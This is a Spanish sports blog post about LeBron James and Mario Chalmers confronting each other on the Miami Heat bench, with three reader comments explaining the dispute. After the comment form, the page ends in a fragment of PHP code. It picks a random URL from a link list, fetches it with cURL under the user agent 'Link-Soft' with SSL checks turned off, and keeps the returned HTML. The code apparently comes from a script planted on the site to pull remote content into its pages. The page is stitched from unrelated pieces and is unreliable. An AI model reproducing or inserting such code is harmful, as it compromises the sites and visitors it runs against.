Lebron James y Mario Chalmers se encaran en el banquillo

19 de December de 2013 por txusma

Comenta

3 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Hay que tenerlos cuadrados para picar a la máxima estrella de la liga cuando además se da la circunstancia de que es un armario empotrado,jajaj.Supongo que no tenía el mejor de los días LeBron,renqueante por el tobillo,el equipo perdiendo en ese momento…curioso que quién frene un poco al 6 sea Howard.

      Citar

  2. Denise dice:
    #2

    Ruxixón:
    Hay que tenerlos cuadrados para picar a la máxima estrella de la liga cuando además se da la circunstancia de que es un armario empotrado,jajaj.Supongo que no tenía el mejor de los días LeBron,renqueante por el tobillo,el equipo perdiendo en ese momento…curioso que quién frene un poco al 6 sea Howard.

    Creo que el que frena a Lebron es Udonis Haslem…y ¿se puede saber por qué era ese pique? ¿habia pasado algo previo en la cancha?

      Citar

  3. GreenPride dice:
    #3

    Lo que había pasado es que hay una jugada en la que LeBron recibe bloqueo y Chalmers no cambia y dejan solo a Paul George que les clavan un triple. LeBron le recrimina a Chalmers no haber cambiado pero Chalmers le dice que no tenía que cambiar y que él debía haber seguido a George. Luego cuando se van al banco se lo recrimina Chalmers a James y este se cabrea.
    En el siguiente tiempo las las cámaras también captan a James llamando a Rio (Chalmers) y pidiéndole disculpasa reconociendo que había sido culpa suya y no de Chalmers.
    A mí me parece un gesto de equipo con ganas y competitivo y Chalmers hace lo que debe un tío con personalidad por mucho que el otro sea el crack del equipo y la máxima estrella de la liga. Si él cree que era culpa de LeBron pues se lo dice y listo.
    Y muy bien LeBron reconociéndoselo tras el primer calentón.
    Yo creo que es un pique normal entre compañeros en un partido en el que no les estaba yendo bien y que luego arreglaron. Eso sí si no paran a LeBron le deja planchao a Chalmers jeje

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>